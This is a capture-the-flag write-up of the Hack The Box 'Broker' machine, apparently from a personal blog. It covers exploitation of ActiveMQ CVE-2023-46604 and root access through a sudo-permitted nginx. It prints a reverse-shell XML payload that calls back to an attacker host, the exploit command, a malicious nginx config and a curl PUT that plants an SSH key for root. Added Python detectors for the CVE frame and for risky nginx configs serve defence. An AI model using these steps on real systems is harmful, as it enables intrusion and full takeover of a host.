
Info

OS: Linux
Difficulty: Easy
Status: Retired
IP: 10.10.11.243

Nmap scan

root@koi:~/Hackthebox/Boker# cat port.nmap
# Nmap 7.80 scan initiated Thu Jan 11 19:42:26 2024 as: nmap -p- -oA Boker/port 10.10.11.243
Nmap scan report for 10.10.11.243
Host is up (0.0034s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
1883/tcp  open  mqtt
5672/tcp  open  amqp
8161/tcp  open  patrol-snmp
41183/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

# Nmap done at Thu Jan 11 19:42:35 2024 -- 1 IP address (1 host up) scanned in 9.47 seconds
root@koi:~/Hackthebox# nmap -sC -sV -p22,80,1883,5672,8161,41183,61613,61614,61616 10.10.11.243 -oA Boker/CV
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 19:46 CST
Nmap scan report for 10.10.11.243
Host is up (0.0039s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
1883/tcp  open  mqtt
|_mqtt-subscribe: ERROR: Script execution failed (use -d to debug)
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Error 401 Unauthorized
41183/tcp open  tcpwrapped
61613/tcp open  unknown
| fingerprint-strings:
|   HELP4STOMP:
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Site doesn't have a title.
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings:
|   NULL:
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion
|_    5.15.15
3 services unrecognized despite returning data. 

The main ports and services are: 22: ssh, 80: web, 8161: web, 61616: ActiveMQ.

Port 61616: ActiveMQ

The version is 5.15.15.
A quick search shows this version is affected by CVE-2023-46604, a remote code execution vulnerability.
X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) exploit tool (github.com)
Edit poc-linux.xml (the shell payload has to be HTML-entity encoded):

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <!-- Reverse shell to 10.10.16.21:1234; '>' and '&' are written as HTML entities so the XML parses -->
                <value>bash -i &#x3E;&#x26; /dev/tcp/10.10.16.21/1234 0&#x3E;&#x26;1</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Run it:

# go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.21:8081/poc-linux.xml
     _        _   _           __  __  ___        ____   ____ _____
    / \   ___| |_(_)_   _____|  \/  |/ _ \      |  _ \ / ___| ____|
   / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |   |  _|
  / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___
 /_/   \_\___|\__|_| \_/ \___|_|  |_|\__\_\     |_| \_\\____|_____|

[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.16.21:8081/poc-linux.xml

[*] Sending packet: 000000781f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010025687474703a2f2f31302e31302e31362e32313a383038312f706f632d6c696e75782e786d6c
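From the defender's side, the frame the tool prints above has a recognisable shape: an OpenWire ExceptionResponse whose "exception class" is a Spring XML application context and whose message is a URL, which is exactly the CVE-2023-46604 pattern. The parser below is an added example, not part of the writeup or of the X1r0z tool; it decodes that frame (hex copied from the output above) and a constructed benign frame, and assumes OpenWire loose encoding, which is what a peer uses before any WireFormatInfo negotiation.

```python
"""Decode an ActiveMQ OpenWire ExceptionResponse frame and flag the CVE-2023-46604 pattern."""
import struct

EXCEPTION_RESPONSE = 0x1F  # OpenWire command type byte for ExceptionResponse

# The flaw: the broker instantiates whatever "exception class" name the peer sends, as long
# as the class has a (String) constructor; Spring XML contexts then load a remote bean file.
SUSPICIOUS_CLASSES = (
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
)

# Frame copied from the exploit tool's "Sending packet" line in the writeup above.
WRITEUP_FRAME = bytes.fromhex(
    "000000781f00000000000000000001010042"
    "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e"
    "436c61737350617468586d6c4170706c69636174696f6e436f6e74657874"
    "010025687474703a2f2f31302e31302e31362e32313a383038312f706f632d6c696e75782e786d6c"
)
# Constructed benign frame: class java.io.IOException, message "boom".
BENIGN_FRAME = bytes.fromhex(
    "000000281f00000000000000000001010013"
    "6a6176612e696f2e494f457863657074696f6e" "010004626f6f6d"
)

def _read_string(buf, off):
    """Loose-encoded OpenWire string: null flag byte, then 2-byte BE length and UTF-8 bytes."""
    if buf[off] == 0:
        return None, off + 1
    (n,) = struct.unpack_from(">H", buf, off + 1)
    return buf[off + 3:off + 3 + n].decode("utf-8"), off + 3 + n

def parse_exception_response(frame):
    """Return {'class', 'message', 'suspicious'} for an ExceptionResponse frame, else None.
    Assumes loose encoding (no BooleanStream), as used before WireFormatInfo negotiation."""
    if len(frame) < 15:
        return None
    (size,) = struct.unpack_from(">I", frame, 0)
    if len(frame) != size + 4 or frame[4] != EXCEPTION_RESPONSE:
        return None
    off = 5 + 4 + 1 + 4  # skip commandId, responseRequired, correlationId
    if frame[off] == 0:  # null Throwable
        return {"class": None, "message": None, "suspicious": False}
    cls, off = _read_string(frame, off + 1)
    msg, off = _read_string(frame, off)
    remote = msg is not None and msg.lower().startswith(("http://", "https://", "file:"))
    flagged = cls in SUSPICIOUS_CLASSES or (cls is not None and "ApplicationContext" in cls and remote)
    return {"class": cls, "message": msg, "suspicious": flagged}
```

The same check can be dropped into an IDS rule or a broker-side log parser: a legitimate client never reports a Spring context class as an exception.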

The reverse shell comes back; stabilise it into a proper TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

The user flag is in the home directory.

Privilege escalation

Start with sudo:

activemq@broker:/tmp$ sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

The current user can run nginx via sudo without a password.
Create a new nginx config file, /tmp/nginx2.conf:

user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1337;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}

Start nginx with the custom config: sudo /usr/sbin/nginx -c /tmp/nginx2.conf
Then curl http://10.10.11.243:1337/root/root.txt to read the flag.
Because the PUT method is enabled, we can also upload a public key to /root/.ssh/authorized_keys:

# upload
curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat ./boker.pub)"
# connect
ssh -i boker root@10.10.11.243

Root shell obtained.
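The config above works because four directives together turn nginx into a root-level file server: user root, root /, autoindex on and dav_methods PUT. The audit script below is an added example, not from the writeup; it parses an nginx config (a constructed copy of /tmp/nginx2.conf above) and flags those directives, which is the check a defender would run on any config nginx is allowed to load via sudo, and it handles nested blocks, quoted arguments and comments.

```python
"""Audit an nginx config for directives that let a sudo-able nginx read or write any file."""
import re

# Constructed from the /tmp/nginx2.conf shown in the writeup above; not a file taken from the box.
SAMPLE_CONF = """user root;
worker_processes 4;
pid /tmp/nginx.pid;
events { worker_connections 768; }
http { server { listen 1337; root /; autoindex on; dav_methods PUT; } }
"""

# Tokens: comment, block/terminator punctuation, quoted string, bare word.
_TOKEN = re.compile(r'''#[^\n]*|[{};]|"[^"]*"|'[^']*'|[^\s{};#"']+''')
WEBDAV_WRITE = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}

def parse_directives(text):
    """Yield (context, name, args) for each simple directive; context is the enclosing block path."""
    stack, cur = [], []
    for tok in _TOKEN.findall(text):
        if tok.startswith("#"):
            continue
        if tok == "{":
            stack.append(cur[0] if cur else "?")
            cur = []
        elif tok == "}":
            if stack:
                stack.pop()
            cur = []
        elif tok == ";":
            if cur:
                yield ("/".join(stack) or "main", cur[0], cur[1:])
            cur = []
        else:
            cur.append(tok.strip("\"'"))

def audit_nginx_conf(text):
    """Return findings for: workers as root, filesystem root served, listing on, WebDAV writes."""
    findings = []
    for ctx, name, args in parse_directives(text):
        if name == "user" and args[:1] == ["root"]:
            findings.append(f"{ctx}: user root (workers run as root)")
        elif name == "root" and args[:1] == ["/"]:
            findings.append(f"{ctx}: root / (whole filesystem served)")
        elif name == "autoindex" and args[:1] == ["on"]:
            findings.append(f"{ctx}: autoindex on (directory listing)")
        elif name == "dav_methods" and WEBDAV_WRITE & {a.upper() for a in args}:
            findings.append(f"{ctx}: dav_methods {' '.join(args)} (write access)")
    return findings
```

The real fix is in sudoers, not nginx: a NOPASSWD rule for a binary that takes -c is equivalent to root, so restrict it to a fixed, root-owned config path or drop it.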

Summary

This box is different from the ones I have done before: the main path in was not a web port such as 80, but a CVE in the ActiveMQ service on port 61616, which gave the foothold. Note that the payload in the XML must be HTML-entity encoded, otherwise it will not run.
For privilege escalation, nginx was run via sudo with a deliberately misconfigured config, giving the equivalent of unauthenticated arbitrary file read and upload (a new trick learned).

Last modification:January 11, 2024